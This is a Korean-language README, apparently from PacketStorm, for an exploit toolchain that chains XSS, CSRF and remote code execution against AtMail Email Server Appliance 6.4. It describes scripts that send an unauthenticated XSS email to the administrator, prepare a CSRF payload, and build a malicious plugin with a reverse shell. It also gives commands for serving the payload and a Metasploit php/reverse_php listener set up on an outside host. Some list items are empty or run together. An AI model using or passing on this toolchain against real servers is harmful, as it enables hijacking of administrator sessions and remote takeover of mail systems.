
AtMail Email Server Appliance 6.4 - 익스플로잇 툴체인 (XSS > CSRF > RCE)
[PacketStorm] [WLB-2020080010]
고지: 이 익스플로잇 툴체인은 EDB-ID 20009에서 영감을 받았습니다.
이 익스플로잇 툴체인의 목표는 EDB-ID 20009를 대체하는 것입니다.
이 툴체인이 EDB-ID 20009 익스플로잇보다 가지는 장점:
EDB-ID 20009 익스플로잇의 단점:
msfvenom)ArchLinux에 요구 사항 설치:
$ sudo pacman -S metasploit tar ruby
익스플로잇 파일:
config.yml 툴체인 구성을 포함exploit.sh 실행해야 하는 익스플로잇 래퍼xss_mail.rb Atmail SMTP 서버를 통해 (인증 없이) XSS가 포함된 이메일을 관리자에게 전송합니다.csrf_prepare.rb CSRF 페이로드를 준비합니다 (대상 설정 및 플러그인 아카이브 인코딩)rce_prepare.rb RCE를 준비합니다 (리버스 셸 생성 및 플러그인 아카이브 생성)csrf_plugin.js 준비된 CSRF 페이로드noraj/ 압축되지 않은 플러그인 구조를 포함하는 폴더이 익스플로잇 툴체인은 수동 단계가 2개뿐입니다:
config.yml 편집exploit.sh 실행하지만 공격을 시작하기 전에 JavaScript CSRF 파일을 제공할 웹 서버와 연결을 기다리는 리버스 셸 리스너가 필요합니다. 따라서 공격은 다음과 같은 형태에 더 가깝습니다:
config.yml 편집csrf_plugin.js를 제공할 HTTP 서버 시작exploit.sh 실행한 줄 HTTP 서버 예시:
$ ruby -run -e httpd . -p 8000
리버스 셸 리스너 예시:
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload php/reverse_php
payload => php/reverse_php
msf5 exploit(multi/handler) > set LHOST 1.1.1.1
LHOST => 1.1.1.1
msf5 exploit(multi/handler) > set LPORT 8080
LPORT => 8080
msf5 exploit(multi/handler) > run